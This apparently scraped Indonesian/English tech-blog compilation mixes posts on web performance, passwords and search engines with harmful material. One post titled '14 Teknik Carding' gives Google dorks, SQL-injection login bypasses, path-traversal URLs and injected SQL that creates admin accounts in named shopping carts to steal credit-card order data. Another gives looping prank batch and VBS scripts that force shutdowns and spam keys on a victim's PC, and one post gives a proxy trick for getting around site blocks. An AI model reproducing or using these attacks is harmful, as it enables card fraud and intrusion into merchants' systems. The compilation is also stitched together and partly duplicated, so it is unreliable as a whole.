Are You Really Worth $428 to Facebook?

Baca Lebih Lanjut......

Since some people are speculating that Facebook’s valuation might be 15 Billion dollars, and there are 34 million active users (by last estimate I could find), that equals to $428 per user. Can that be a realistic lifetime value of an average Facebook user?

I know this is an oversimplification, but it is still a way to look at the staggering number in terms of one of Facebook’s most valuable metrics.

What is the average lifetime value of a Google user? Does anyone have any idea?

Maybe it all makes sense in the end, but when you’re throwing these sort of valuations around for websites (whose visitors tend to be historically fickle) it starts sounding a little crazy.

Is your blog too heavy?

Baca Lebih Lanjut......

With all the widgets popping up from different websites that allow you to add photos, videos, bookmarks, and tools to your blog, it’s becoming easier and easier to bloat your pages to the point where they start to fall under their own weight.

This was recently illustrated by the case of A VC Blog, where Fred’s site got so bad, it warranted its own “wow, my blog is slow” post. Fred from Webreakstuff gave him the lowdown about what was actually causing the unbearably slow page loads.

With broadband penetration being as high as it is, it’s easy to start ignoring the size of your pages. If you ever hope to be Dugg, you HAVE to mind your load speeds. It’s a lesson we learned the hard way with this blog earlier this month. If you don’t want your first time visitors clicking the “back” button once they get to your blog and want people to actually like coming back and reading your posts, you have to mind your load speeds.

Ask yourself “is this plugin/widget/script adding something useful to my blog or am I really the only one who cares to see my cat’s flickr stream on my business blog?” and “how much does it slow down my site?” It might be time to trim at least a few of them – or maybe move them to their own pages and replace them with a link.

Use the Speed Analysis Tool and check out the stats on your blog. The tool is not perfect (and frankly a little outdated) so don’t take it as gospel but it’s a pretty good starting point. (This blog takes 17 requests and 38k to load. Not too bad.) The “Analysis and Recommendations” at the bottom is really strict in my opinion. It tells you that your site should be 30K or less and your external scripts should be 8K or less. I’m going to guess that if you went by these “Kilobyte Nazi” standards, your site would look and function a little like this. I mean, even Eric Meyer’s website gets a caution.

Audit your blog once in a while.

3 Quick Ways to Speed Test Your Website and Improve Loading Time

Baca Lebih Lanjut......

Does your website load in 2.4 seconds or 240? With today’s high broadband penetration, many people have started to take load times for granted. I run into more and more websites that take a long time to load due to bad coding, gratuitous (and risky) use of widgets, an ungodly amount of embedded media, etc. Yesterday even Techcrunch was brough down due to these issues. If your pages are slow to load, people won’t come back. Here are some ways to speed test your website:

1. The very basic speed test
In last week’s webmaster tools post Lee mentioned iwebtool’s speed check which returns the size and estimated loading time of any site. The tool is pretty basic though – it only gives you the size of the page itself (and not anything else). You can get this same info by running a Google search for your site using “site:[yourdomain.com]” – it will return the size of the page next to the domain.

2. Old school Web Page Speed Report
This tool has existed for ages. It gives you a succinct breakdown of the number of objects, http requests, and download times estimates. The recommendations at the bottom are pretty stringent (by today’s standards). One drawback is that the tool doesn’t take into account external scripts or load times caused by objects called by them, which in reality isn’t the whole picture.

3. The Firebug Website Speed Test
This method requires that you install the Firefox extension Firebug (which is free and open source). It’s definitely worth it though because it gives you the most complete picture of how your website loads. After installing the extension – open up firebug (bottom right check-mark in your Firefox window) and click on the “Net” tab, then load your website. It will show you in real time how the elements load along with their size and download speed. This lets you pinpoint bottlenecks and elements that slow down your site. You can even break them up by type (html, css, javascript, flash). This method shows you all the objects that are loaded, even those that are called by external javascript. This, in my opinion, is by far the best way to speed test your website.

Using method 3 (Firebug) I was able to see that Feedbutton (which I’ve since removed) was causing 11+ second delays in load time on this website. Do yourself and your visitors a favor and test the load times of your sites. Do it. C’mon. Do it.

10 Things That Will Make Or Break Your Website

Baca Lebih Lanjut......

These are the top 10 things I learned from attending the Future of Web Apps Conference 2006 in San Francisco earlier this month. The summit was hosted by Carson Systems and included speakers like Kevin Rose, Mike Arrington, Mike Davidson, and more. It’s a condensed and aggregated summary of points covered by different speakers throughout the conference that I found most useful.

1. EASY is the most important feature of any website, web app, or program.
Discoverability – everything is easy to find, features meant to enhance, not distract – can still be advanced, as long as it’s easy. Recoverability – actions should be without cost (ex: Digg, UnDigg). The web is about fulfilling needs – create things that let people do this as easily as possible. Drive usage. Generate touchpoints for easy spreading – easy to tell friends, relentlessly remove barriers to account signups. Make the website easy to use. Then make it easier.

2. Visual design and copy are extremely important.
Your credibility is at stake. Don’t have your coder do xhtml/css. Start with the design, then markup, then develop the backend. Obsess about your copy and how you communicate to your visitors via text to complement how you communicate with your visitors visually. Remove distractions and simplify.

3. Open up your data as much possible.
The future is not in owning data. Expose every axis of your data for people to mash up. Get an API and release it out to the wild, but stay conscious of abuse, whether intentional or not (ex: newbie programmers unwittingly making 100 server requests/sec.) Offer an RSS feed for everything on your site.

4. Test, test, test.
You can do your best to make educated guesses about what will work, but you will never know unless you create it and then test it. Create goals and measurements to be able to gauge progress. Good example: contrary to previous predictions, it looks like contextual ads don’t work well in RSS feeds. (Branding ads perform better). That was only known after testing. Then again, this may not apply to your niche – test, test, test!

5. Release features early and often.
Start with a core set of features (and create plugins on top) – always know your end goals. Don’t offer “me too” features just to to have them – stay true to your core. Small increments show visible progress. If you stay personable and honest and set expectations, people will be a lot more receptive when things break. Ideally your development should be modular, incremental, and well documented to mitigate future problems.

6. Be special.
Passion for what you are doing and creating is paramount. If you believe it, do it. Don’t let anyone else tell you that it’s not possible or shouldn’t be done. Create purple cows. Challenge the status quo. Do it against the odds and with little startup money. (Raising too much money can hurt you and make you lose focus.) Prove all your detractors wrong. Passion and a belief in yourself will get you through the rough times.

7. Don’t be special.
Use common standards or open source frameworks whenever possible. Don’t reinvent the wheel unnecessarily. Also, try to share user databases, ecommerce systems, and other elements between your projects to prevent siloing.

8. If you plan on developing a successful webapp, plan for scalability from the ground up.
Anticipate growth and plan for problems ahead of time. Document everything. If you want a good real-world case study on scalability, check out Inside LiveJournal’s Backend (PDF). Find a top notch hardware partner if you don’t want to deal with the nitty gritty yourself.

9. Watch, pay attention to, or implement right away:
1. Microformats (opens up your data easily and contextually)
2. Adobe Apollo (deploy Rich Internet Applications easily)
3. Whobar (manage digital identity)
4. Akismet (stop comment spam)

10. User generated content and social software trends
This is a bit of a catchall, but I’d like to list what has been working and not working in the user generated content space.
1. Not working:
1. Requiring participation from square 1. Not all users need to participate to generate social value.
2. Buying communities.
3. Social networks for the sake of social networks.
4. Wikipedia consensus model (many people contribute to one idea for the greater good) is not a good model in general and probably cannot be duplicated outside Wikipedia.
2. Working:
1. Giving users control, being open to different uses you did not anticipate.
2. Dunbar principle – segments of under 150 people.
3. The individual should get value and the organization should derive aggregated value from all the individuals.
4. Social sites have and need different types of users and each should be motivated/rewarded equally.
5. Many voices generate emergent order: you can get much value out of all that data.

There was a lot of other really good information and insight that I’ve not covered here. For more in-depth coverage and summary of each speaker’s contributions, check out Allen’s excellent summit notes and recap.

Hopefully by paying attention to these points you will make it to the winners list and void the losers list, next time Paul Scrivens does a roundup.

(Also, thanks to Copyblogger for guidance about writing a better headline.)

TIPS PEMAKAIAN PASSWORD

Baca Lebih Lanjut......

Mungkin terkesan mudah, dan aku mohon maaf jika artikel ini
kesannya terlalu 'low content', tetapi tidak !! password
merupakan hal vital dalam proses Authentication, so bagi
yang udah tau tolong koreksinya, kalo yang belum, boleh di
pahami.


Agar Password yang digunakan efektif maka :

1. Minimal mempunyai panjang 6 karakter, lebih baik lagi jika
panjangnya minimal 8 karakter dan terdapat sedikitnya 1 buah
karakter angka atau karakter yang special .

2. Tidak memiliki maksud/makna, password yang memiliki makna
atau maksud akan relatif lebih mudah untuk di tebak misalnya:
nama pacar, nama anggota keluarga, alamat,tanggal lahir dsb.

3. Sebaiknya di beri periode berlaku, artinya sering seringlah
mengganti password yang di gunakan

4. Jangan gunakan kembali nama login (username) untuk sebagai
password dalam bentuk apapun, baik diganti huruf kapital,
dibalik, diulang dsb.

5. Jangan gunakan kata-kata yang umum dan terdapat dalam kamus.

6. Jangan pernah mencatat password yang anda pakai ditempat2
yang dapat diakses umum, atau berakibat fatal apabila hilang

7. jangan gunakan password yang sulit dalam artian membuat anda
kesulitan menghapalnya tetapi tetap tidak menggurangi kekuatannya.
ingat! mudah dihapal tidak selalu mudah ditebak :P

8. jangan pernah memberitahukan password anda kepada orang lain
baik dengan berbagai alasan tertentu

9. apabila anda rasa perlu silakan gunakan software atau utilitas
tambahan untuk menambah keamanan password anda

10.tidak ada salahnya mencoba mencrack password anda sendiri
agar anda yakin!

11.usahakan untuk tidak menggunakan password yang sama pada
account yang berbeda.

12. sedapat mungkin untuk menggunakan kombinasi karakter.

13. ......

contoh password : C0nT*hP4SSwoRD+

Hirarki Hacker

Baca Lebih Lanjut......

Mungkin agak terlalu kasar jika di sebut hirarki / tingkatan hacker;
saya yakin istilah ini tidak sepenuhnya bisa di terima oleh masyarakat
hacker. Oleh karenanya saya meminta maaf sebelumnya. Secara umum yang
paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin
lebih sering di sebut ‘suhu’.Sedangkan, di ujung lain derajat hackerdikenal
‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’.

Elite :
Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan
ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar
dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global.
Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat
alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan
tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui,
walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu
mengikuti peraturan yang ada.

Semi Elite:
Hacker ini biasanya lebih mudadaripada Elite.Mereka juga mempunyai kemampuan
& pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi
(termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecilprogram cukup
untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan
oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di
kategorikan Lamer.

Developed Kiddie:
Sebutan ini terutamakarena umur kelompok ini masih muda (ABG)&masih sekolah.
Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan.
Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan
kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface
(GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan
baru di sistem operasi.

Script Kiddie:
Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas.
Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking
yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan
menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna
Internet.

Lamer:
Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi hacker
(wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker &
ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC,
tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan
hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri
melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite,
dalam perkembangannya mereka hanya akan sampai level developed kiddie atau
script kiddie saja.

cara buka web yg udah di blokir

Baca Lebih Lanjut......

nih ada langkah2 nya tuk msk ke web yg di blokir
klo mozzila buka
tools > options > advanced > settings > manual proxy connection > isi 200.133.15.2 port 3128 selamat menikmati

dapet dARI MOD trims ya

jika sdh selesai tuk buka web yg di blokir jgn lupa ngembalikan spt semula dgn cr pilih auto detect....

Mencegah baterai laptop meledak

Baca Lebih Lanjut......

* Jika baterai melemah dan masa operasinya berkurang drastis, lebih baik langsung membeli baterai baru. Jangan coba-coba memperbaiki baterai yang sudah rusak untuk dipakai kembali.

* Selalu pastikan bahwa Anda memakai baterai yang asli dari penjual resmi. Jika baterai asli saja dilaporkan banyak yang meledak, apalagi dengan baterai palsu.

* Jangan mengisi ulang baterai Anda lebih dari 8 jam. Mengisi ulang baterai terlalu lama dilaporkan beresiko menimbulkan ledakan.

* Jika baterai sudah penuh saat diisi ulang, pilih salah satu saja, memakai daya listrik atau baterai saat Anda ingin menggunakan laptop.

* Pakailah charger pengisi ulang yang kompatibel dengan baterai Anda. Charger yang tidak sesuai akan meningkatkan resiko overheating.

* Jangan letakkan notebook di area yang dapat menjadi sangat panas, misal di bagasi mobil atau di bawah terik matahari.

* Selalu ikuti perkembangan berita teknologi, misalnya di situs berita online. Biasanya jika terjadi masalah pada baterai laptop, vendor laptop tersebut akan melakukan penarikan besar-besaran. Jika Anda mengikuti perkembangan dan kebetulan laptop Anda bermasalah, Anda bisa mengikuti prosedur yang sudah ditentukan misalnya penukaran baterai.

4 Tools Gratis Mengembalikan File yang Terhapus

Baca Lebih Lanjut......

Bro-bro menghapus file-file penting di komputer lo tanpa disengaja? Kasus seperti ini mungkin pernah menimpa u u semua, terkadang terjadi karena kita tengah terburu-buru atau dikejar waktu.

Tapi santai, Anda bisa menggunakan tools khusus untuk mengembalikan file-file tadi. Berikut ini ada 4 tools yang bisa Anda gunakan untuk mengembalikan file yang terhapus. Tools ini dapat di-download secara gratis di internet.


1. Undelete Plus
Di antara aplikasi-aplikasi gratis yang beredar di luaran untuk mengembalikan file yang terhapus, Undelete Plus salah satu yang dapat digunakan. User interface-nya (antar muka) tergolong sangat simpel. Anda dapat mengembalikan file-file yang terhapus dengan mudah sesuai dengan tipe file, misalnya Application, GIF graphics, HTML Documents, PDF.

Tools ini beroperasi pada sistem operasi Windows 95, Windows 98, Windows Me, Windows NT, Windows 2000, Windows XP, Windows 2003 dan Windows Vista. Anda dapat men-download Undelete Plus di: http://www.undelete-plus.com/

2. Restoration
Restoration adalah salah satu aplikasi untuk mengembalikan file yang terhapus. Tools ini juga sangat mudah digunakan dan tidak perlu diinstal di komputer. Cukup download toolsnya di: http://www.snapfiles.com/get/restoration.html, lalu jalankan file executable-nya untuk mengembalikan file yang terhapus.

3. PC Inspector File Recovery
Meski user interface PC inspector File Recovery tidak begitu user friendly, aplikasi ini tergolong sangat ampuh untuk mendeteksi dan mengembalikan file yang terhapus. Sesudah dilakukan proses scanning, akan tersaji file-file yang terhapus dalam folder dengan struktur pohon (tree structure) untuk mempermudah pencarian. Dengan begitu, Anda dengan mudah dapat mencari dan memilih file/folder yang terhapus, lalu klik icon "save" untuk mengembalikan file. Tools ini dapat di-download di: http://www.pcinspector.de/Sites/file...htm?language=1

4. Recuva
Recuva sering disebut juga sebagai "Recover". User interface-nya sangat sederhana. Pada mode basic, tools ini akan menampilkan daftar file-file yang terhapus yang bisa dikembalikan. Jika Anda menggantinya ke mode advanced, maka proses scanning ulang akan dilakukan dan muncul pilihan untuk menampilkan informasi berisi daftar file-file yang terhapus. Tools ini dapat di-download di: http://www.recuva.com/

Penyebab utama kerusakan Hardisk

Baca Lebih Lanjut......

Mengapa hardisk sering mengalami BAD SECTOR, Mengapa Hardisk tiba2 terbakar .....?

Penyebab utamanya adalah pasokan power yg kurang atau berkelebihan.

Tips nya harus pakai stavol, trus perhatikan power supplai di pc anda, apabila sudah lebih dari 3 tahun harus berhati2... karena biasanya kekuatannya sdh berkurang.

7 script Yang Berguna / Ngeselin abizzz

Baca Lebih Lanjut......

buka notepad lalu copy paste script di bawah.....

1.message yang nongol melulu

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT
ket:
walaupun di kill task manager,masih tetep nongol message nya :D
kata2 nya bisa diganti sesuai selera masing2...:o
apalagi yg sedang jatuh cinta...kasih tuh ke gebetan lu...:D
di kirain cinta gila...:D

2.bikin shutdown+message

@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"
save namafile.BAT

3.Mainin Caps Lock button

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
save namafile.vbs

4.buka tutup CD/DVD

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs
ampir mirip ama punya nya habs :maho

5.bikin vbscript nongol mlulu

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
save namafile.vbs
ket:di task manager full wscript yg lg running :D


6.teken tombol backspace mlulu

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
save namafile.vbs

7.otomatis ngetik "lu jelek banget sih" di notepad/word

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loopsave namafile.vbs

14 Teknik Carding

Baca Lebih Lanjut......

Kali ini saya memberikan 14 teknik carding…. Saya membuat artikel ini bukan dengan niat jahat tetapi dengan niat baik agar artikel ini dapat menjadi pembelajaran dalam memerangi masalah carding yang sudah mencoreng nama bangsa ini. Indonesia terkena black list country. Bukankah itu sangat memalukan, bukan ???

Oleh karena itu saya berharap semoga anda dapat memanfaat artikel ini demi kebaikan dan kemjuan security di Indonesia.

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem :D CShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format

http://www.xxxxx.com/cart32/

Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :

http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%20select%20fldauto,

fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template=order.log

13. contoh bugs pada bentuk toko sistem :P roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :D igishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

Domainname .com.net.org 100% gratis !!!

Baca Lebih Lanjut......

Info domain gratis bagi yg berminat aja

www.FreePremiumDomain.com

NB: maaf klo repost

terimakasih atas perhatiannya..hehehe

Pastikan Blog/Website Anda Terdaftar di 10 Search Engine Terbesar

Baca Lebih Lanjut......

Apakah website atau blog anda sudah di crawl sama google? Tahukah anda kalau ada 9 buah search engine besar lainnya? Posisi anda di google juga di tentukan oleh hasil crawl/indexing oleh 9 search engine besar lainnya!

Terdaftar di google? Sudah dunk, pasti gitu jawabannya! 9 Search engine besar? Mungkin sebagian dari anda belum tau atau lupa! Website/blog saya sudah terdaftar di google tapi pengunjung masih belum seperti yang diharapkan? Kemungkinan dengan Prase kata kunci tertentu web/blog anda masih masih jauh di belakang. Mau kedepan? Pastikan juga website/blog anda sudah terdaftar di 9 search engine besar lainnya!

Disini tidak akan membahas cara mendaftarkannya tapi bagaimana memastikan website/blog anda sudah terdaftar di 10 search engine besar tersebut. Apa saja 10 search engine tsb?

1. Google
2. Yahoo
3. Bing
4. Ask
5. AllTheWeb
6. AOL
7. Lycos
8. Dogpile
9. AltaVista
10. Clusty

Pesan Pribadi (Offline)


Pastikan Blog/Website Anda Terdaftar di 10 Search Engine Terbesar
« pada: Desember 17, 2009, 04:46:11 pm »
Jawab dengan kutipan
Apakah website atau blog anda sudah di crawl sama google? Tahukah anda kalau ada 9 buah search engine besar lainnya? Posisi anda di google juga di tentukan oleh hasil crawl/indexing oleh 9 search engine besar lainnya!

Terdaftar di google? Sudah dunk, pasti gitu jawabannya! 9 Search engine besar? Mungkin sebagian dari anda belum tau atau lupa! Website/blog saya sudah terdaftar di google tapi pengunjung masih belum seperti yang diharapkan? Kemungkinan dengan Prase kata kunci tertentu web/blog anda masih masih jauh di belakang. Mau kedepan? Pastikan juga website/blog anda sudah terdaftar di 9 search engine besar lainnya!

Disini tidak akan membahas cara mendaftarkannya tapi bagaimana memastikan website/blog anda sudah terdaftar di 10 search engine besar tersebut. Apa saja 10 search engine tsb?

1. Google
2. Yahoo
3. Bing
4. Ask
5. AllTheWeb
6. AOL
7. Lycos
8. Dogpile
9. AltaVista
10. Clusty


Cape juga kan kalau anda melakukan cek satu persatu? Berikut triknya : Gunakan search engine dengan fasilitas multiple search engine! Nich Linknya : http://id.nowgoogle.com (jika web/blog anda berbahasa indonesia) Langsung masukkan kata kunci domain anda, misal : resep.web.id silakan lihat hasil pengecekan yang kami lakukan untuk resep.web.id ini, klik disini! Sepertinya sudah semua! Bagaimana dengan website/blog anda?